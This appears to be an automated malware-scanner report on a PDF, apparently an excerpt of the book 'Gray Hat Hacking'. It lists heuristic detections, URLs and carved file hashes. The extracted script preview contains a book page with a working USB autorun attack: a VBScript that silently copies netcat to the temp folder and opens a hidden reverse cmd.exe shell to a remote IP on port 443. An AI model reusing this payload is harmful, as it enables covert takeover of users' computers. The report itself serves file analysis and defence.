MALICIOUS
170
Risk Score
Machine Learning
- Nyx PDF Classifier suspicious score 0.4662
Heuristics 7
-
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Unusually high stream count medium PDF_MANY_STREAMSPDF contains 501+ stream objects — may indicate heap spray or heavy obfuscation
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Urgency / deadline lure low SE_URGENCY_LUREDocument contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://logicalsecurity.com/cissp In PDF document text
- http://attrition.org/errata/legal_threats/In PDF document text
- http://mioglobal.comIn PDF document text
- http://isorecorder.alex-In PDF document text
- http://isorecorder.alexfeinman.com/isorecorder.htmIn PDF document text
- http://www.ftc.gov/bcp/edu/In PDF document text
- http://searchwindowssecurity.techtarget.com/In PDF document text
- http://w2.eff.org/In PDF document text
- http://www.mozilla.org/security/bug-bounty.htmlIn PDF document text
- http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFGIn PDF document text
- http://mp3support.sandisk.com/downloads/In PDF document text
- http://unetbootin.sourceforge.netIn PDF document text
- http://download.virtualbox.org/virtualbox/3.1.6/In PDF document text
- https://help.ubuntu.com/community/LiveCD/PersistenceIn PDF document text
- http://archive.offensive-security.comIn PDF document text
- http://www.iec.chIn PDF document text
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
stream_018_off00010be7.bin |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x10BE7 | 5543 bytes |
SHA-256: f1c74457fb9fc4e8d2feb15b49f92428a2378ce19e0b134ce914342dd91e5061 |
|||
stream_163_off001293d2.bin |
decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x1293D2 | 225792 bytes |
SHA-256: 24d9b6be636885c91a0118a3ad5595f05b58a35fc57c78057d442d75d8c54f0c |
|||
embedded_pdf_script_00132306.bin |
pdf-embedded-script | PDF decompressed stream script payload at offset 0x132306 | 6839 bytes |
SHA-256: 6ce044aaaa5e227794b281c7828b8847eb7403680366b2eaceeb6ed57e99c30a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 shell/COM execution token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
q
0.498 G
/GS2 gs
0.998 w
q
1 0 0 1 62.446 625.889 cm
0 0 m
413.128 0 l
S
Q
BT
0 g
/F8 1 Tf
7.9831 0 0 7.9831 62.4456 629.3816 Tm
[(G)-28.5(r)-25.2(a)-5.5(y)0( H)-22.8(a)-12.1(t H)-22.8(a)-20(c)-24.4(k)-21.9(i)-18.3(n)-14.9(g)-22.4(,)0( T)-16.9(h)-19(e E)-13.2(t)-20.4(h)-19.3(i)-14.6(c)-27.7(a)-27.3(l H)-22.8(a)-20(c)-24.4(k)-3.9(e)-19.6(r)-38.4<90>33.5(s)0( H)-22.8(a)-27.1(n)-20.5(d)-18.4(b)-16.5(o)-16.3(o)-18.2(k)-21.9(, T)-16.9(h)-19.3(i)-18.3(r)-18.2(d E)-15.3(d)-18.7(i)-13.6(t)-16(i)-14.6(o)-19.1(n)] TJ
/F10 1 Tf
0.0009 Tc
13.9705 0 0 13.9705 62.4456 612.9164 Tm
(84) Tj
ET
/GS1 gs
BT
/F3 1 Tf
0 Tc
0.0334 Tw
9.9789 0 0 9.9789 120.3234 594.0162 Tm
[(Extracting the default autorun.inf file is simple and contains only a few directiv)18(es)18(. )] TJ
0.0012 Tw
1.2 TL
9.9789 0 0 9.9789 104.3572 582.0415 Tm
[(In this example)36(, w)18(e)0( will replace the executable call with a script of our o)18(wn. Our script )] TJ
0.0807 Tw
9.9789 0 0 9.9789 104.3572 570.0668 Tm
[(will perform an attack using netcat to push a command shell to a remote computer)55(, )] TJ
-0.048 Tw
9.9789 0 0 9.9789 104.3572 558.0922 Tm
[(and then execute the originally specified program, LaunchU3.exe)36(, so that the user w)18(on\220t )] TJ
-0.0199 Tw
9.9789 0 0 9.9789 104.3572 546.1175 Tm
[(notice an)18(y abnormal beha)18(vior when they plug the USB driv)18(e in. The unedited autorun.)] TJ
0 Tw
9.9789 0 0 9.9789 104.3572 534.1428 Tm
[(inf file is as follo)18(w)18(s)0(:)] TJ
/F15 1 Tf
7.6838 0 0 7.6838 92.3824 517.898 Tm
([AutoRun]) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 508.3194 Tm
(open=wscript LaunchU3.exe -a) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 498.7384 Tm
(icon=LaunchU3.exe,0) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 489.1598 Tm
(action=Run U3 Launchpad) Tj
7.6838 0 0 7.6838 92.3824 479.5812 Tm
([Definitions]) Tj
1.247 TL
7.6838 0 0 7.6838 92.3824 469.9995 Tm
(Launchpad=LaunchPad.exe) Tj
1.2465 TL
7.6838 0 0 7.6838 92.3824 460.4216 Tm
(Vtype=2) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 450.8407 Tm
([CopyFiles]) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 441.2621 Tm
(FileNumber=1) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 431.6819 Tm
(File1=LaunchPad.zip) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 422.101 Tm
([Update]) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 412.5224 Tm
(URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG) Tj
7.6838 0 0 7.6838 92.3824 402.9437 Tm
([Comment]) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 393.3636 Tm
(brand=PelicanBFG) Tj
/F3 1 Tf
9.9789 0 0 9.9789 120.3234 374.4798 Tm
[(F)18(or our purposes)18(, w)18(e\220ll only edit the second line of this file and change it from)] TJ
/F15 1 Tf
7.9831 0 0 7.9831 104.3572 357.5157 Tm
(open=wscript LaunchU3.exe -a) Tj
/F3 1 Tf
9.9789 0 0 9.9789 104.3572 339.5536 Tm
(to) Tj
/F15 1 Tf
7.9831 0 0 7.9831 104.3572 322.5894 Tm
(open=wscript cruzer/go.vbs) Tj
/F3 1 Tf
0.0563 Tw
9.9789 0 0 9.9789 120.3234 304.6273 Tm
[(When the autorun.inf file is executed on insertion of the device)36(, our go.vbs script )] TJ
0.0081 Tw
1.2 TL
9.9789 0 0 9.9789 104.3572 292.6526 Tm
[(will run instead of the LaunchU3.exe application. W)55(e\220ll put it in a directory called cru-)] TJ
-0.0048 Tw
9.9789 0 0 9.9789 104.3572 280.6779 Tm
(zer along with the netcat binary nc.exe in an attempt to make it slightly less noticeable ) Tj
-0.0296 Tw
9.9789 0 0 9.9789 104.3572 268.7033 Tm
[(at a casual glance)36(. Next w)18(e)0( need to create our go.vbs script. Since w)18(e\220re just demonstrat-)] TJ
0.1146 Tw
9.9789 0 0 9.9789 104.3572 256.7286 Tm
[(ing the technique)36(, w)18(e\220ll keep it v)18(ery simple)36(, as sho)18(wn next. The script will cop)18(y the )] TJ
0.0878 Tw
9.9789 0 0 9.9789 104.3572 244.7539 Tm
[(netcat binary to the Windo)18(w)18(s)0( temp directory and then execute the )] TJ
/F5 1 Tf
0 Tw
0 TL
9.9789 0 0 9.9789 400.983 244.7539 Tm
(netcat) Tj
/F3 1 Tf
0.0878 Tw
9.9789 0 0 9.9789 427.9459 244.7539 Tm
[( command )] TJ
0 Tw
1.2 TL
9.9789 0 0 9.9789 104.3572 232.7792 Tm
[(with options to bind a cmd.exe command shell and pass it to a remote computer)55(.)] TJ
/F15 1 Tf
-0.015 Tc
7.6838 0 0 7.6838 92.3824 214.5385 Tm
('This prevents the script from throwing errors in the event it has trouble) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 204.9583 Tm
( On Error Resume Next) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 195.3797 Tm
( set objShell = WScript.CreateObject\("WScript.Shell"\)) Tj
7.6838 0 0 7.6838 92.3824 185.8011 Tm
('Get the location of the temp directory) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 176.2209 Tm
( temp=objShell.ExpandEnvironmentStrings\("%temp%"\)) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 166.64 Tm
('Get the location of the Windows Directory) Tj
7.6838 0 0 7.6838 92.3824 157.0591 Tm
( windir=objShell.ExpandEnvironmentStrings\("%windir%"\)) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 147.4789 Tm
( set filesys=CreateObject\("Scripting.FileSystemObject"\)) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 137.9003 Tm
('Copy our netcat into the temp directory of the target) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 128.3193 Tm
( filesys.CopyFile "cruzer\\nc.exe", temp & "\\") Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 118.7392 Tm
('Wait to make sure the operation completes) Tj
1.2466 TL
7.6838 0 0 7.6838 92.3824 109.1606 Tm
( WScript.Sleep 5000) Tj
1.2468 TL
7.6838 0 0 7.6838 92.3824 99.5804 Tm
[('Throw a command prompt to the waiting remote computer, a local test in this case.)-15( )] TJ
7.6838 0 0 7.6838 92.3824 90.00024 Tm
('The 0 at the end of the line specifies that the command box NOT be displayed to) Tj
1.2469 TL
7.6838 0 0 7.6838 92.3824 80.41931 Tm
('the user.) Tj
7.6838 0 0 7.6838 92.3824 70.83838 Tm
[( objShell.Run temp & "\\nc.exe -e " & windir & "\\system32\\cmd.exe 192.168.1.106)-15( )] TJ
1.2466 TL
7.6838 0 0 7.6838 92.3824 61.25975 Tm
(443",0) Tj
1.2467 TL
7.6838 0 0 7.6838 92.3824 51.68036 Tm
('Execute the application originally specified in the autorun.inf file) Tj
7.6838 0 0 7.6838 92.3824 42.10097 Tm
( objShell.Run "LaunchU3.exe -a") Tj
ET
q
0.4765 0.25003 546.047 672.5 re
W
n
/Cs8 CS
0 SCN
/GS2 gs
1.247 w
q
1 0 0 1 -3.4153 664.308 cm
0 0 m
-14.968 0 l
S
1 0 0 1 553.831 0 cm
0 0 m
14.968 0 l
S
1 0 0 1 -553.831 -655.616 cm
0 0 m
-14.968 0 l
S
1 0 0 1 553.831 0 cm
0 0 m
14.968 0 l
S
1 0 0 1 -541.856 667.59 cm
0 0 m
0 14.968 l
S
1 0 0 1 0 -679.565 cm
0 0 m
0 -14.968 l
S
1 0 0 1 529.881 679.565 cm
0 0 m
0 14.968 l
S
1 0 0 1 0 -679.565 cm
0 0 m
0 -14.968 l
S
Q
1 SCN
0.249 w
q
1 0 0 1 -3.4153 664.308 cm
0 0 m
-14.968 0 l
S
1 0 0 1 553.831 0 cm
0 0 m
14.968 0 l
S
1 0 0 1 -553.831 -655.616 cm
0 0 m
-14.968 0 l
S
1 0 0 1 553.831 0 cm
0 0 m
14.968 0 l
S
1 0 0 1 -541.856 667.59 cm
0 0 m
0 14.968 l
S
1 0 0 1 0 -679.565 cm
0 0 m
0 -14.968 l
S
1 0 0 1 529.881 679.565 cm
0 0 m
0 14.968 l
S
1 0 0 1 0 -679.565 cm
0 0 m
0 -14.968 l
S
Q
Q
Q
|
|||
icc_00_off0000ae09.icc |
pdf-icc-profile | PDF ICC profile at offset 0xAE09 | 3144 bytes |
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e |
|||
font_00_cff_off0000137e.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x137E | 1286 bytes |
SHA-256: 8f9c632df3c537842e5b997664a39bab94a2360a23d344b69fe83dea3abb4e3a |
|||
font_01_cff_off00001f9d.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x1F9D | 4441 bytes |
SHA-256: 39866c982cce9b95edaf1f108ad6122b6413dbfa21176f0913a4307c8a033ea4 |
|||
font_02_cff_off000039f5.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x39F5 | 11150 bytes |
SHA-256: 202c94db7816df5db504155d107a1a844d838df44bb3a66aa39eee12298b9b61 |
|||
font_03_cff_off00006359.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x6359 | 8521 bytes |
SHA-256: c1c84a0d9b9d7fc6716270c07d4268f75f88feeea393763d7783ad847bf9dfad |
|||
font_04_cff_off000089ad.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x89AD | 10398 bytes |
SHA-256: d7e5f7db1cf54102d21d5f49223aa2cd80b8e2aec0cbcfc6c7b5a989307d48f3 |
|||
font_05_sfnt_off0000bb1b.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xBB1B | 24420 bytes |
SHA-256: 1e1032c2b85d078406acde410a7dfe83d3d3a6165c63dacdbeb98bbb994309c8 |
|||
font_07_sfnt_off000131b7.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x131B7 | 63712 bytes |
SHA-256: fd8b3f23a2f018b241c4a5cc3fa853434f15a039a62db3db9313a0c80972b8e4 |
|||
font_08_sfnt_off0001c8bf.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x1C8BF | 24092 bytes |
SHA-256: aa86d7c97a3ce253a8dded92749757db54f09480f921979ce0819b8fb3b7238b |
|||
font_09_cff_off00020b44.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x20B44 | 19855 bytes |
SHA-256: e4f5509fa3526b6f8450a914a1ff150b6bf03291f4b8c8fecf276253ea3c465e |
|||
font_10_cff_off00024748.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x24748 | 19331 bytes |
SHA-256: 4e8720a850e20cb09242a8f13c1e8d972f5ad9ec7216b6a0f6aad9b7af4814f5 |
|||
font_11_cff_off000544f9.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x544F9 | 1313 bytes |
SHA-256: 89726ea9ec1699a9aa015f1c4de4bd4cb4e2d66b40776698c181b6efc3fad78a |
|||
font_12_cff_off00054f76.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x54F76 | 4483 bytes |
SHA-256: 75b42bfd8f007500500eba477d10c97d79699fbf0a17949ae091e0f1f5658e46 |
|||
font_13_cff_off00056517.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x56517 | 2762 bytes |
SHA-256: 57f54bbd462e3241568af35ed8c5306620c7a746da947c8472ee1b2201f7e32b |
|||
font_14_cff_off0007c914.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x7C914 | 20451 bytes |
SHA-256: f7a8d68b2c1225c12a651d28739d0c1a04a368de8152ed59d807b3ffecf6d245 |
|||
font_15_cff_off000bd277.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xBD277 | 5762 bytes |
SHA-256: e3504ff5921e45f6de6abf80a1ff8bb6d18eb7251a5e3659a36dd4c5f1c8c193 |
|||
font_16_cff_off000bf1e7.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xBF1E7 | 1110 bytes |
SHA-256: 28537943d6ce0208e8439bde3bd408e1749d12b50b72c8a1c80194b25e4d68f8 |
|||
font_17_cff_off000c00e7.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xC00E7 | 6696 bytes |
SHA-256: 80361b75aa71376ddfc7320848678fd5e2de98549235a7653f8df944d8cfc78c |
|||
font_18_cff_off000cb82d.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xCB82D | 838 bytes |
SHA-256: f1a4e4a4b556df645361ff9a614a7a75ed59aab975f915aeb9f3f500ac428d1c |
|||
font_19_cff_off000cbf3f.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xCBF3F | 319 bytes |
SHA-256: 7f43f8ddcf133d193b31a89705d1517a3fbb300c01e1634f34dbb5a10a75fda0 |
|||
font_20_cff_off000ce00d.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xCE00D | 5835 bytes |
SHA-256: b172aa00a43caab8cdd21b93e6fc84b530945778eb91d8f3562b473e366a2bcf |
|||
font_21_cff_off000f0613.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0xF0613 | 2499 bytes |
SHA-256: b315c89deffd59b19b209d43eb03c51fca9b6a9e0a8c942598d7cb8e8eee5348 |
|||
font_22_cff_off001326d9.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x1326D9 | 21748 bytes |
SHA-256: 47a51045562980291024c24d77073d5da9dab0dfb5e95dc0b07624dd669089ea |
|||
font_23_cff_off001978e5.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x1978E5 | 15694 bytes |
SHA-256: 70090ace14ba234aac2d463cfe1adec4a62f9cd789915d9413b44553804d7268 |
|||
font_24_cff_off0020345b.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x20345B | 6720 bytes |
SHA-256: 50686e2e0a73635ad7434206e24ca0960f780c79a68e203ebc8c2845d4cce79b |
|||
font_25_cff_off003c2f52.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x3C2F52 | 265 bytes |
SHA-256: b90f75ee12925575b9a25e133366ae4ae5703b73a6e18bdf5a010f3da87d1530 |
|||
font_26_cff_off003ebb75.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x3EBB75 | 12452 bytes |
SHA-256: f1a3caf1260dd0d86057b796153c30b0266b769ddad027b9663afe6df14a0a9d |
|||
font_27_cff_off00464c23.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x464C23 | 1694 bytes |
SHA-256: 223597bdefa86e5f025f0c6ea6985f3400822230051e5dac063e8df3ec1675ea |
|||
font_28_cff_off0069e716.bin |
pdf-font-stream | PDF embedded font (cff) at offset 0x69E716 | 6221 bytes |
SHA-256: a13529c77b9490d2751b0155aed1fc60357353dda23266c2c7879e810d28c278 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.